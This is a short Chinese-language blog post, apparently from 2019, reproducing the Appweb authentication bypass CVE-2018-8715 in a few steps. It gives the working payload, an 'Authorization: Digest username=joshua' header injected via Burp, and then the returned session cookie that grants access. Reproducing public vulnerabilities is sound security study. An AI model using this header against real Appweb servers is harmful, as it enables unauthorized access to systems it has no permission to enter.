Appweb(CVE-2018-8715)漏洞复现
Created at 2019-07-03 Updated at 2019-08-15 Category 漏洞渗透
Appweb(CVE-2018-8715)漏洞复现
1.访问IP用burp进行抓包。
2.通过抓包软件拦截,添加以下HTTP 头信息后,发送数据包,返回结果为200就是成功。
Authorization: Digest username=joshua
3.获取HTTP 头信息中的session,如以下格式,返回码为200,出现以下页面就成功绕过身份验证。
-http-session-=58::http.session::49ad964885b60878bc1c90ad79f6cbc0
